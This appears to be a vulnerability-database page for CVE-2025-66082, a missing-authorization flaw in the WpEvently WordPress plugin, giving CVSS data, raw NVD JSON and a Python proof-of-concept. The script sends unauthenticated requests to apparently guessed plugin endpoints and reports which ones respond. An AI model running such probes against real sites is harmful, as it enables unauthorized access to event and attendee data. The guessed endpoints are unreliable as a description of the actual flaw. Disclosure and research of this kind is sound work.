Security Vulnerability Report
中文
CVE-2025-66082 CVSS 5.3 MEDIUM

CVE-2025-66082

Published: 2025-11-21 13:15:49
Last Modified: 2026-04-27 18:16:34

Description

Missing Authorization vulnerability in magepeopleteam WpEvently mage-eventpress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WpEvently: from n/a through <= 5.0.4.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WpEvently <= 5.0.4
mage-eventpress <= 5.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-66082 PoC - WpEvently Missing Authorization # Target: WordPress site with WpEvently plugin <= 5.0.4 TARGET_URL = "https://vulnerable-site.com" def check_vulnerability(): """Check if target is vulnerable to CVE-2025-66082""" # Common WpEvently API endpoints that may be affected endpoints = [ "/wp-json/wpevently/v1/events", "/wp-json/wpevently/v1/attendees", "/wp-json/wpevently/v1/settings", "/wp-admin/admin-ajax.php?action=wpevently_get_events", "/wp-admin/admin-ajax.php?action=wpevently_manage_event" ] for endpoint in endpoints: url = f"{TARGET_URL}{endpoint}" try: # Send unauthenticated request response = requests.get(url, timeout=10) # Check if response indicates missing authorization if response.status_code == 200: print(f"[+] Potential vulnerability at: {endpoint}") print(f"[+] Status: {response.status_code}") print(f"[+] Response preview: {response.text[:200]}...") elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected endpoint: {endpoint}") except requests.RequestException as e: print(f"[!] Error testing {endpoint}: {e}") if __name__ == "__main__": print("CVE-2025-66082 WpEvently Vulnerability Checker") print("=" * 50) check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66082", "sourceIdentifier": "[email protected]", "published": "2025-11-21T13:15:49.117", "lastModified": "2026-04-27T18:16:34.173", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in magepeopleteam WpEvently mage-eventpress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WpEvently: from n/a through <= 5.0.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/mage-eventpress/vulnerability/wordpress-wpevently-plugin-5-0-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}